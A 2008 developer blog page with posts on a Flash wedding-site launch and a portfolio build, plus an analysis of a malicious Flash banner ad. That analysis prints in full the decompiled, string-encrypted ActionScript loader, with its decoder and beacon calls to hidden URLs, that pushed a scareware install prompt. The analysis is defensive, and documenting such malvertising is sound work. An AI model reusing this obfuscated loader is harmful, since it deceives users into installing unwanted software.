Weddingtracker launched!

Comments Published June 14th, 2008 in Website Analysis, Flash, Portfolio

Weddingtracker launched on June 12th around 2:30PM CST and it has been about 8 long months of development and battle to get it out the door. With over 18,000 lines of code, over 400 files and 64mb in size this has been by far my most complicated Flash project ever. You can see the 13 template files in action on the Weddingtracker sample sites page. We did not design the sites so be sure to look past the front-end user interface when continuing through this post. I want to detail some of the finer points of the production and elements that I am happy with.

The entire project was coded using ActionScript 3.0 and the underlying framework that was used was PureMVC for Flash CS3. It was very stable once we got comfortable with working in its rather verbose arena. Each of the components that made up a users website existed in external files. Template layout, page type content, template colors, menu types, custom media display files and embedded font resource files. All of this makes for an extremely extensible code base that will allow for much more complicated designs without endangering the underlining controller code that sets up how the user interacts with the different pages.

All of the colors and text formatting are loaded in from CSS files that are defined in the initial XML file loading process. These CSS classes are accessed by the different page type controllers when they format themselves. Placeholder movieclips are used in the template resource files to define the location and size of the page type elements. The first class in the CSS files defines a list of used embedded font files required for accurate rendering. These font files are loaded from external SWF files and then registered to the Flash application for usage on embedded TextFields. Many of the ideas that made up this runtime font loader came from this post Runtime font loading with AS3 Flash CS3 not Flex.

I think that this code base is a great start to what could be an excellent product with some more attention to the design and user interface components. I expect to be working on it for the next couple of weeks for post launch issues and into the future when new templates are designed. All of the work over the last 8 months will be extremely helpful when it comes to fixing bugs or making improvements in the future.

I wanted to say thank you to everyone who helped code this impressive project and see it through launch. Susannah was with me in development from the very beginning and the project would not have launched without her help. Andres and Hal came in at the end of the project and worked two weekends in a row to get the template css and skin files setup for me while I finished the components and Susannah worked on custom template elements. I am already looking forward to my next major project but needed to reflect on over half a years work and a successful launch. Congratulations to everyone who worked on this project in the .NET development, all the HTML and CSS work and thank you to the IT project manager for being there from beginning to end of the marathon project.

New Portfolio Site Launch!

Comments Published May 29th, 2008 in Website Analysis, Flash, Portfolio

I launched my new portfolio site for Barrett Sonntag Online and wanted to talk a little on the technical aspects of the new all Flash site. After doing my analysis on the World of Warcraft website (worldofwarcraftcom front and back-end analysis) I wanted to see what it would take to combine a little JavaScript, HTML and Flash to create a SEO compliant full page Flash site. I have been shy about using full page Flash since getting my name listed in the major search engines, Flash is notoriously bad at SEO because it’s content is not usually indexable.

I wanted Flash to take the content straight from the page it was loaded it, to make it’s containing page have the XML data it would load. JavaScript provided the method required already, innerHTML. The innerHTML functionality works to take a HTML DOM elements subnodes and copy the structure and body text as a string. It worked great in Firefox and Safari but IE was screwing with the output forcing element names to uppercase and stripping quotes (”) from attribute values. Flash choked on this malformed XML data and I was stuck. I looked for a couple hours for how I could remedy IE’s nasty way of handling innerHTML and decided to sleep on it after posting on a popular online forum WebDeveloper.com. I didn’t get the answer handed so much as the path shown when I woke up the next morning, regular expressions. You can see the thread and my terrible but working solution http://www.webdeveloper.com/forum/showthread.php?t=182391.

With the IE innerHTML issue out of the way I was able to move on to the design of the site. Multiple columns with minimum wide items that auto adjusted just like inline elements in HTML. I don’t envy web browser developers this was no easy task. The next issue I ran into was setting up the Actionscript 3.0 event MouseWheel.MOUSE_SCROLL to fire allowing for the rows to move via the mousewheel or trackpad scrolling. It worked wonderfully in all browsers on my PC and failed completely on the test Macs I had access too. Lucky for me someone had already done the footwork and setup a JavaScript function that told the Flash file when the MOUSE_SCROLL event was being fired since Firefox and Safari on the Mac were not. Gabriel is to thank for this wonderfully easy to setup solution you can find on his site http://blog.pixelbreaker.com/flash/as30-mousewheel-on-mac-os-x/.

I am extremely happy with the outcome of this site as it is that full page Flash I was hoping for while still allowing search engines to see the full content of the site laid out in divs using class and id attributes.

De-constructing Malicious Flash

Comment Published November 22nd, 2007 in Website Analysis, Flash

Last Friday I was approached by my boss to look into an advertisers banners due to reports of malware notifications when browsing our site. It sounded far fetched to think that Flash was executing malicious code on the client side browsers but I cracked open the SWF files with a de-compiler to take a look.

It was a mess, a little searching let me know that it was probably encrypted by Amayeta SWF Encrypt as seen from the review at Flash Valley. It turned out that my superiors had already confronted the client with the information that they suspected their ads of containing malware and the client replied with a fixed version that they had just handed over me to look at.

I wasn't going to stop there though and I found the original files to see if they matched. File size of the originals was smaller so I threw them through the de-compiler again and lo there was human readable code. Why would the client send over fixed files that were obfuscated when the originals were not?

Here is the code that I found sitting in an unassuming movieclip with not content other than the single frame and actionscript.

PLAIN TEXT
ACTIONSCRIPT:
  1. _root.c1 = "47ED02";
  2. _root.c2 = "46E91A247C";
  3. _root.c3 = "7FF817257C8DF8";
  4. _root.c4 = "50E70523";
  5. _root.c5 = "7FD7153B7080E795EA776F";
  6. _root.c6 = "48FC022723CCA3A8F36070509F2105CBA738D20F50A22FD09E2BB7495689293D5623312668";
  7. _root.c7 = "11";
  8. _root.c8 = "10";
  9. _root.c9 = "10";
  10. _root.c10 = "11";
  11. _root.c11 = "10";
  12. _root.c12 = "17";
  13. _root.c13 = "48FC022723CCA3";
  14. _root.c14 = "10";
  15. _root.c15 = "0DB1";
  16. _root.c16 = "10";
  17. _root.c17 = "48FC022723CCA3A7E67676518C201D9BA138D20F50A263C7922FAD031B923C634721342266E62EB8CBA9707F3088182CC3";
  18. _root.c18 = "14B8";
  19. _root.c19 = "53ED17257A8BF8A5F66B774FCB73559FE6268157";
  20. _root.c20 = "0F";
  21. _root.c21 = "11BF446F29D3BCFAAF";
  22. _root.c22 = "7FD7022D";
  23. _root.c23 = "7FFD043B";
  24. _root.c24 = "53FD14246D91";
  25. _root.c25 = "7FD7102363";
  26. _root.c26 = "7FD7103B6F";
  27. _root.c27 = "7FD710347188";
  28. _root.c28 = "53ED1833";
  29. _root.c29 = "47ED0203708EE9B0F06B666C9C2317CAA0";
  30. String.prototype.color = function (eslogan)
  31. {
  32.    var _loc3 = eslogan;
  33.    var result = "";
  34.    var _loc1;
  35.    var n;
  36.    var _loc2;
  37.    _loc1 = 0;
  38.    (n = this.length);
  39.    while (_loc1 <n)
  40.    {
  41.        _loc2 = parseInt(this.slice(_loc1, _loc1 + 2), 16) ^ _loc3>> 8 & 255;
  42.        if (_loc2> 127)
  43.        {
  44.            _loc2 = _loc2 + 848;
  45.        } // end if
  46.        result = result + String.fromCharCode(_loc2);
  47.        _loc3 = (_loc3 * 52845 + 22719) % 16777215;
  48.        _loc1 = _loc1 + 2;
  49.    } // end while
  50.        trace(result);
  51.    return (result);
  52. };
  53. _root[_root.c26.color(14688422)] = function ()
  54. {
  55.    var _loc1 = _root;
  56.    _loc1._visible = false;
  57.    _loc1.createEmptyMovieClip("emc", _loc1.getNextHighestDepth());
  58.    _loc1.emc.u = dt.getTime();
  59.    if (parseInt(_loc1.c10.color(14688422)))
  60.    {
  61.        _loc1.emc.loadVariables(_loc1.c17.color(14688422),_loc1.c1.color(14688422));
  62.        _loc1.i = setInterval(_loc1[_loc1.c27.color(14688422)], 100);
  63.        return;
  64.    } // end if
  65.    _loc1[_loc1.c27.color(14688422)]();
  66. };
  67. _root[_root.c27.color(14688422)] = function ()
  68. {
  69.    var _loc1 = _root;
  70.    if (_loc1.emc.stats == _loc1.c2.color(14688422) || !parseInt(_loc1.c10.color(14688422)))
  71.    {
  72.        clearInterval(_loc1.i);
  73.        new LoadVars()[_loc1.c28.color(14688422)](_loc1.c6.color(14688422),_loc1.c3.color(14688422), _loc1.c4.color(14688422));
  74.        so = SharedObject.getLocal(_loc1.c19.color(14688422),_loc1.c20.color(14688422));
  75.        so.data.uzhe = _loc1.uzhe = 1;
  76.        if (_loc1.emc.exp)
  77.        {
  78.            dt = new Date();
  79.            cr = dt.getTime();
  80.            so.data.expires = cr + _loc1.emc.exp * 24 * 60 * 60 * 1000;
  81.        } // end if
  82.        so.flush();
  83.        return;
  84.    } // end if
  85.    if (_loc1.emc.stats || --_loc1.lim == 0)
  86.    {
  87.        _loc1._visible = !(_loc1.uzhe && parseInt(_loc1.c9.color(14688422)));
  88.        clearInterval(_loc1.i);
  89.    } // end if
  90. };
  91. if (r == undefined)
  92. {
  93.    r = 1;
  94.    _root.uzhe = 0;
  95.    _root.lim = parseInt(_root.c18.color(14688422));
  96.    _root[_root.c22.color(14688422)] = -new Date()[_root.c29.color(14688422)]() / 60;
  97.    if (parseInt(_root.c18.color(14688422)) && (!parseInt(_root.c7.color(14688422)) || _root[_root.c23.color(14688422)][_root.c24.color(14688422)](parseInt(_root.c11.color(14688422)), parseInt(_root.c12.color(14688422))) == _root.c13.color(14688422)) && (!parseInt(_root.c14.color(14688422)) || !(_root[_root.c22.color(14688422)]>= parseInt(_root.c15.color(14688422)) && _root[_root.c22.color(14688422)] <= parseInt(_root.c16.color(14688422)))))
  98.    {
  99.        dt = new Date();
  100.        cr = dt.getTime();
  101.        so = SharedObject.getLocal(_root.c19.color(14688422), _root.c20.color(14688422));
  102.        _root.uzhe = so.data.uzhe;
  103.        _root._visible = !(_root.uzhe && parseInt(_root.c9.color(14688422)));
  104.        if (parseInt(_root.c8.color(14688422))> 1)
  105.        {
  106.            if (!so.data.expires)
  107.            {
  108.                so.data.expires = cr;
  109.            } // end if
  110.            ++so.data.view;
  111.        } // end if
  112.        if (cr> so.data.expires || so.data.view == parseInt(_root.c8.color(14688422)))
  113.        {
  114.            so.data.expires = cr + parseInt(_root.c21.color(14688422));
  115.            so.flush();
  116.            _root[_root.c26.color(14688422)]();
  117.        } // end if
  118.        so.flush();
  119.    } // end if
  120. } // end if
  121.  
  122. false;

Wow, it was like nothing I had ever seen before. I immediately stuck a trace at the end of the new String prototype for result to see just what types of information it was returning.

PLAIN TEXT
CODE:
  1. __flv
  2. __fchk
  3. 40
  4. __tz
  5. getTimezoneOffset
  6. 40
  7. 1
  8. 7
  9. 0
  10. _url
  11. substr
  12. http://
  13. __flv
  14. __fchk

The last two lines __flv and __fchk just kept repeating as the SWF played on. I turned to the search engines and started pasting parts of this code in to find someone else that had run into this. I turned up a txt file from the site Mike on Ads - Errorsafe. He even put together an example of what this type of code can do if you look at the comments of that post or just visit it directly at http://mikeonads.com/errorsafe_test.html (just don't click Yes when it prompts you to install stuff). As Mike pointed out this is circumvented with new security features in the Flash 9 player and setting AllowScriptAccess false in the HTML embed / object code.

I wanted to document my experience with this mainly to give another source of reference because Mike on Ads was the only reference to this code I could find and wasn't able to find anyone who could explain just what this code wants to do with the users browser.

« Previous Entries

Search

LatestRSS